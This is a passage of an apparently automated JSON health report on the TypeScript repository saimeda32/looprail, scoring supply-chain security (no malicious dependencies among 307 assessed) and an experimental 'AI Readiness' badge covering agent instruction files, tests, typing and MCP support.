{
"key": "no_advisories_left_outstanding",
"name": "No advisories left outstanding",
"detail": "no advisory carries a publication date",
"points": 0,
"status": "excluded",
"details": [
{
"code": "advisories_no_publication_date",
"params": {}
}
],
"max_points": 40
}
]
},
{
"key": "malicious_dependencies",
"band": "excellent",
"name": "Malicious dependencies",
"note": null,
"notes": [],
"value": 100,
"inputs": {
"source": "osv",
"meaning": "reported as a malicious package by the OpenSSF corpus; the remedy is removal or moving off the compromised name, never an upgrade of the same artifact. Versions the registry has since pulled are listed but not scored",
"packages": [],
"red_flag": false,
"assessed_packages": 307,
"malicious_packages": 0,
"direct_malicious_packages": 0,
"withdrawn_malicious_packages": 0,
"installable_malicious_packages": 0
},
"components": [
{
"key": "no_dependency_reported_as_a_malicious_package",
"name": "No dependency reported as a malicious package",
"detail": "no dependency is reported as a malicious package",
"points": 100,
"status": "met",
"details": [
{
"code": "no_malicious_dependencies",
"params": {}
}
],
"max_points": 100
}
]
}
],
"description": "Are visible security and supply-chain practices strong, with no malicious dependency and no unresolved high-risk jurisdiction exposure?"
},
{
"key": "ai_readiness",
"band": "moderate",
"name": "AI Readiness",
"value": 61,
"weight": 0,
"metrics": [
{
"key": "ai_agent_context",
"band": "at_risk",
"name": "Agent context & guidance",
"note": null,
"notes": [],
"value": 40,
"inputs": {
"has_llms_txt": false,
"legible_history_share": 0.96,
"agent_instruction_files": [],
"agent_instruction_max_bytes": null
},
"components": [
{
"key": "agent_instructions",
"name": "Agent instructions",
"detail": "no CLAUDE.md / AGENTS.md / editor rules",
"points": 0,
"status": "missed",
"details": [
{
"code": "no_agent_instructions",
"params": {}
}
],
"max_points": 45
},
{
"key": "machine_readable_docs_llms_txt",
"name": "Machine-readable docs (llms.txt)",
"detail": null,
"points": 0,
"status": "missed",
"details": [],
"max_points": 15
},
{
"key": "legible_commit_history",
"name": "Legible commit history",
"detail": "96 of 100 human commits state their intent (structured subject or explanatory body)",
"points": 40,
"status": "met",
"details": [
{
"code": "legible_history",
"params": {
"legible": 96,
"sampled": 100
}
}
],
"max_points": 40
}
]
},
{
"key": "ai_verify_loop",
"band": "moderate",
"name": "Verify loop (build / test / typecheck)",
"note": null,
"notes": [],
"value": 62,
"inputs": {
"has_nix": false,
"has_tests": true,
"lockfiles": [
"package-lock.json"
],
"has_dockerfile": false,
"typed_language": true,
"bootstrap_files": [],
"has_devcontainer": false,
"has_linter_config": true,
"typecheck_configs": [
"tsconfig.json"
],
"agent_commit_share": 0,
"toolchain_manifests": [],
"dependency_bot_commit_share": 0
},
"components": [
{
"key": "one_command_bootstrap",
"name": "One-command bootstrap",
"detail": null,
"points": 0,
"status": "missed",
"details": [],
"max_points": 18
},
{
"key": "automated_tests",
"name": "Automated tests",
"detail": null,
"points": 22,
"status": "met",
"details": [],
"max_points": 22
},
{
"key": "lint_format_config",
"name": "Lint / format config",
"detail": "eslint.config.js",
"points": 11,
"status": "met",
"details": [
{
"code": "file_list",
"params": {
"files": "eslint.config.js"
}
}
],
"max_points": 11
},
{
"key": "static_type_checking",
"name": "Static type checking",
"detail": "tsconfig.json",
"points": 11,
"status": "met",
"details": [
{
"code": "file_list",
"params": {
"files": "tsconfig.json"
}
}
],
"max_points": 11
},
{
"key": "reproducible_environment",
"name": "Reproducible environment",
"detail": "lockfile",
"points": 10,
"status": "met",
"details": [
{
"code": "file_list",
"params": {
"files": "lockfile"
}
}
],
"max_points": 10
},
{
"key": "demonstrated_agent_practice",
"name": "Demonstrated agent practice",
"detail": "no agent-authored commits among the last 100",
"points": 0,
"status": "missed",
"details": [
{
"code": "no_agent_authored_commits",
"params": {
"sampled": 100
}
}
],
"max_points": 10
},
{
"key": "automated_maintenance",
"name": "Automated maintenance",
"detail": "dependency automation configured, none observed in the sampled commits",
"points": 5,
"status": "partial",
"details": [
{
"code": "dependency_bot_config_only",
"params": {}
}
],
"max_points": 8
},
{
"key": "openssf_scorecard_pinned_dependencies",
"name": "OpenSSF Scorecard: Pinned-Dependencies",
"detail": "dependency not pinned by hash detected -- score normalized to 3",
"points": 3,
"status": "partial",
"details": [],
"max_points": 10
}
]
},
{
"key": "ai_code_legibility",
"band": "excellent",
"name": "Code legibility for models",
"note": null,
"notes": [],
"value": 100,
"inputs": {
"primary_language": "TypeScript",
"largest_source_bytes": 89014,
"source_files_sampled": 233,
"oversized_source_files": 2
},
"components": [
{
"key": "type_checkable_code",
"name": "Type-checkable code",
"detail": "TypeScript (statically typed)",
"points": 45,
"status": "met",
"details": [
{
"code": "statically_typed_language",
"params": {
"language": "TypeScript"
}
}
],
"max_points": 45
},
{
"key": "manageable_file_sizes",
"name": "Manageable file sizes",
"detail": "2/233 source files over 60KB",
"points": 54.5,
"status": "partial",
"details": [
{
"code": "oversized_source_files",
"params": {
"kb": 60,
"sampled": 233,
"oversized": 2
}
}
],
"max_points": 55
}
]
},
{
"key": "ai_interfaces",
"band": "moderate",
"name": "Machine-readable interfaces",
"note": null,
"notes": [],
"value": 60,
"inputs": {
"example_dirs": [
"examples"
],
"has_mcp_signal": true,
"api_schema_files": []
},
"components": [
{
"key": "api_schema_openapi_graphql_proto",
"name": "API schema (OpenAPI/GraphQL/proto)",
"detail": null,
"points": 0,
"status": "missed",
"details": [],
"max_points": 40
},
{
"key": "mcp_server",
"name": "MCP server",
"detail": null,
"points": 20,
"status": "met",
"details": [],
"max_points": 20
},
{
"key": "runnable_examples",
"name": "Runnable examples",
"detail": "examples",
"points": 40,
"status": "met",
"details": [
{
"code": "file_list",
"params": {
"files": "examples"
}
}
],
"max_points": 40
}
]
}
],
"description": "How well is the repo equipped to be developed and maintained with AI coding agents? An independent, experimental badge — weight 0.0, so it is surfaced on its own and does not affect the overall health score."
}
],
"metrics_version": "1.13.0"
},
"warnings": [
"deps.dev does not index npm:looprail@0.11.0; advisories assessed against the repository dependency graph instead"
],
"report_type": "repository",
"generated_at": "2026-07-21T18:47:32.810429Z",
"schema_version": "0.23.0",
"badge_url": "https://raw.githubusercontent.com/inspect-software/badges/main/v1/s/saimeda32/looprail.svg",
"full_name": "saimeda32/looprail",
"license_state": "standard",
"license_spdx": "MIT"
}